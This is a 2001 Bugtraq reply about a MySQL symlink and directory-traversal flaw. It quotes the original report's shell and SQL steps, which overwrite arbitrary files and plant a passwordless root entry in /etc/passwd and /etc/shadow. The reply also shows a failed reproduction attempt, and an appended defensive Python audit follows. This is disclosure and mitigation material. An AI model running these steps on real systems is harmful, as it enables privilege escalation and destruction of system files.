Bugtraq mailing list archives
Re: potential vulnerability of mysqld running with root privileges
From: "Ryan W. Maple" <ryan () GUARDIANDIGITAL COM>
Date: Tue, 20 Mar 2001 12:38:29 -0500
I was unable to reproduce this with MySQL 3.22.32. Here is a transcript:

[rwm@tester tmp]$ rpm -q MySQL
MySQL-3.22.32-1.0.8
[rwm@tester tmp]# ps auxwww | grep mysql | grep ^root | wc -l
4
[rwm@tester /root]# ls -la /var/tmp/qqq.ISD
lrwxrwxrwx 1 rwm admin 12 Mar 20 08:46 /var/tmp/gotcha.ISD -> /root/GOTCHA

"test" is a user I created with full access (all 'Y's in mysql.user):

[rwm@tester rwm]$ mysql -utest -ptest00 '../../tmp'
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 3.22.32

Type 'help' for help.

mysql> CREATE TABLE gotcha(qqq VARCHAR(255));
ERROR 1: Can't create/write to file '/var/tmp/gotcha.ISD' (Errcode: 13)
mysql> INSERT INTO gotcha VALUES ("I just owned you");
Query OK, 1 row affected (0.00 sec)

The file still contains my original string, instead of what I INSERT'd:

[root@webtool /root]# cat /root/GOTCHA
This is a test of the MySQL exploit. :)

3.20 is terribly old. I would recommend upgrading anyway. And for the record, Red Hat 7.0 ships with a user/group 'mysql' under which the daemon runs (I guess they read up, not sure what version of the MySQL RPM you saw it running as root under...).

Cheers,
Ryan

+-- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --+
Ryan W. Maple                                   Guardian Digital, Inc.
"If you eliminate the redundancy, sleep is a four letter word." -CW
+-- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --+

On Sun, 18 Mar 2001, Pavlov, Lesha wrote:
> Anybody who gets a login and password to mysql can use it for a DoS or r00t exploit, because mysql accepts '../blah-blah' as a valid database name, and each table is represented by 3 files: tablename.ISD, tablename.ISM and tablename.frm. But when mysqld checks whether a table already exists or not, it checks _only_ tablename.frm.
>
> Using these "vulnerable features of mysql" to make a big DoS (will overwrite any file you wish):
>
> $ cd /var/tmp
> $ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
> $ mysql -u user -h localhost -p somepassword '../../tmp'
> create table qqq(www int);
> \q
> $
>
> File /some/file/you/wish/to/overwrite will be overwritten.
>
> Usage as r00t exploit:
>
> $ cd /var/tmp
> $ ln -s /etc/passwd gotcha.ISD
> $ ln -s /etc/shadow make_me_r00t.ISD
> $ mysql -u user -h localhost -p somepassword '../../tmp'
> create table gotcha(qqq varchar(255));
> create table make_me_r00t(qqq varchar(255));
> insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
> insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
> \q
> $
>
> You getta r00t now!
>
> Recommendations:
> * Patch mysql so that when it checks whether a table is present, it checks all tablename.{ISD,ISM,frm} files, not only tablename.frm
> * Patch mysql to treat database names starting with '..' as incorrect database names.
> * And the main recommendation - do not run mysqld as root!!!
>
> Patches: not yet
>
> Workaround: chown existing database tables to a normal user and run mysqld as this unprivileged user - it will be a better solution!
>
> Vulnerable versions: This DoS/exploit was tested on mysql-3.20.32a, but I see other versions of mysql are also vulnerable.
>
> Comments: The mysql docs recommend not running mysqld as root, but the people from RedHat didn't read the mysql docs - mysql installed from rpm is vulnerable.
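As an added example from the defender's side (not code from either poster or from MySQL), two checks that map onto the recommendations above: a database-name check that rejects the '../..' traversal the report depends on, and an audit that walks a data directory and reports any .ISD/.ISM/.frm entry that is a symlink resolving outside it. The identifier allowlist, the function names and the constructed directory layout are assumptions made for this example.

```python
import os
import re
import tempfile

# Per-table files in the ISAM-era MySQL the report covers (3.20/3.22).
TABLE_SUFFIXES = (".ISD", ".ISM", ".frm")

def is_safe_db_name(name: str) -> bool:
    """Reject database names such as '../../tmp' that escape the data dir.
    The allowlist is an assumption, stricter than MySQL's own rules:
    one plain path component, no separators, no '..'."""
    if not name or len(name) > 64 or name in (".", ".."):
        return False
    return re.fullmatch(r"[A-Za-z0-9_$]+", name) is not None

def find_escaping_table_links(datadir: str):
    """Return (link, resolved_target) for each .ISD/.ISM/.frm entry under
    datadir that is a symlink resolving outside datadir, i.e. the kind of
    link the report plants with 'ln -s /etc/passwd gotcha.ISD'."""
    root = os.path.realpath(datadir)
    findings = []
    for dirpath, _dirs, files in os.walk(datadir):  # dir symlinks not followed
        for fname in files:
            path = os.path.join(dirpath, fname)
            if not fname.endswith(TABLE_SUFFIXES) or not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([root, target]) != root:
                findings.append((path, target))
    return findings

def build_demo_datadir() -> str:
    """Constructed layout: one normal table, one harmless in-tree link and
    one .ISD link pointing outside the data directory."""
    base = tempfile.mkdtemp(prefix="mysql-audit-")
    tbl = os.path.join(base, "datadir", "test")
    os.makedirs(tbl)
    for suffix in TABLE_SUFFIXES:
        open(os.path.join(tbl, "ok" + suffix), "w").close()
    victim = os.path.join(base, "victim.txt")  # stands in for /etc/passwd
    open(victim, "w").close()
    os.symlink(os.path.join(tbl, "ok.ISM"), os.path.join(tbl, "inside.ISM"))
    os.symlink(victim, os.path.join(tbl, "gotcha.ISD"))
    return os.path.join(base, "datadir")

if __name__ == "__main__":
    for name in ("test", "../../tmp"):
        print(name, "->", "ok" if is_safe_db_name(name) else "rejected")
    for link, target in find_escaping_table_links(build_demo_datadir()):
        print("table file escapes data dir:", link, "->", target)
```

Run against a real data directory the audit only reads link targets, so it is safe to schedule alongside the chown-and-unprivileged-user workaround the report suggests.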